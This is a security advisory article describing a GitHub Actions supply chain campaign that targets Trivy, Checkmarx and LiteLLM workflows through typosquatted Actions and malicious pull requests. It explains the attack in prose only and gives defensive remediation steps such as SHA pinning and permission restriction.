GitHub Actions Supply Chain Crisis: Attackers Targeting Trivy and LiteLLM Workflows
Dillip Chowdary
Cybersecurity Lead • March 25, 2026
Security researchers have detected a sophisticated supply chain attack targeting developers using GitHub Actions. The campaign, which initially focused on the Trivy vulnerability scanner, has now expanded to include Checkmarx and LiteLLM.
The attackers are utilizing typosquatting and malicious pull requests to inject rogue code into common CI/CD workflows. Once executed, the code attempts to harvest AWS_ACCESS_KEY_ID, GCP_CREDENTIALS, and other sensitive environment variables, exfiltrating them to a remote command-and-control (C2) server.
How the Attack Works
The primary vector involves a malicious GitHub Action that mimics the official Trivy Action. Developers who accidentally reference the wrong repository—or who pull from an unpinned "main" branch—may inadvertently pull in a version of the tool that includes a post-install script designed for credential theft.
In the case of LiteLLM, attackers have been found submitting "bug fix" pull requests that include obscured Base64-encoded strings within the testing suite. These strings, when decoded during the CI run, initiate a reverse shell that gives the attackers direct access to the runner environment.
Critical Remediation Steps
If your organization uses Trivy, LiteLLM, or Checkmarx within GitHub Actions, we recommend the following immediate actions:
- Pin Actions by Commit SHA: Never use tags (like `@v1`) or branch names (like `@main`). Only use immutable commit hashes to ensure you are running verified code.
- Audit Workflow Permissions: Ensure your GitHub Actions have the minimum necessary permissions. Use the `permissions: contents: read` block to restrict token access.
- Scan for Exfiltration: Check your egress logs for unusual connections to unknown IP addresses during the time of your CI/CD runs.
Conclusion
This attack highlights the growing vulnerability of the AI-native supply chain. As developers integrate more third-party tools and libraries to handle LLM orchestration, the attack surface for CI/CD pipelines has expanded exponentially. Constant vigilance and strict security pinning are now mandatory for safe development.